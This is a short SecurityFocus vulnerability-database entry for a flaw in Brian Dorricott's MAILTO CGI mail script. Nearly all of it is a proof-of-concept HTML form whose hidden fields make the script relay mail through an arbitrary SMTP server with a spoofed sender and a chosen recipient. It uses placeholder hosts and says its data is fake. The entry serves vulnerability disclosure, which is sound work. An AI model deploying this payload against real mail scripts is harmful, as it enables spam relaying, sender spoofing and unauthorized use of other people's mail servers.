Brian Dorricott MAILTO Unauthorized Mail Server Use Vulnerability

The following example has been provided by http-equiv@excite.com <http-equiv@excite.com>:


<FORM ACTION="HTTP://WWW.MALWARE.COM/CGI-BIN/MAILTO.EXE" METHOD="POST">
<INPUT TYPE="hidden" NAME="sendto" VALUE=billg@bloatedcorp.com>
<INPUT TYPE="hidden" NAME="email" VALUE="hotsuezzz@xxxxxxrated.com">
<INPUT TYPE="hidden" NAME="server" VALUE="smtp.malware.com">
<INPUT TYPE="hidden" NAME="subject" VALUE="SPAM MONGER">
<INPUT TYPE="hidden" NAME="resulturl" VALUE=http://ww.malware.com>

Name: <INPUT NAME="uname" SIZE=30>
Position: <INPUT NAME="title" SIZE=30>
Company: <INPUT NAME="company" SIZE=30>
E-Mail: <INPUT NAME="email" SIZE=30>
Comments:<TEXTAREA name="comments" ROWS=10 COLS=50 SIZE="10"></TEXTAREA>

Press <INPUT TYPE="submit" VALUE="Submit">
Idiot <INPUT TYPE="HALT !" VALUE="The Above Is A Example Only - The Data Is Fake">


 

Privacy Statement
Copyright 2010, SecurityFocus